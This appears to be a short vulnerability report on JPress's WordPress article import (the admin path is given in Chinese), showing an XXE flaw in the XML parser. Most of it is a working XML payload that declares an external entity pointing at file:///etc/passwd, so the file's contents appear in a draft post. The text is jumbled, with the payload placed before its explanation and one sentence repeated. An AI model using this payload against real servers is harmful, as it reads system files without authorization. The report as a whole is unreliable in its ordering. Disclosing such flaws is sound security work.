<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<item>
<wp:post_type>post</wp:post_type>
<title>2</title>
<content:encoded>&f;</content:encoded>
<wp:status>draft</wp:status>
</item>
The /etc/passwd contents can be read in draft article:
"系统管理"-"系统"-"小工具箱"-"WordPress文章导入":
io.jpress.module.article.controller.admin._WordpressImport#doWordPressImport
io.jpress.module.article.kit.wordpress.WordPressXmlParser#parse
upload a constructed xml,such as:
The /etc/passwd contents can be read in draft article: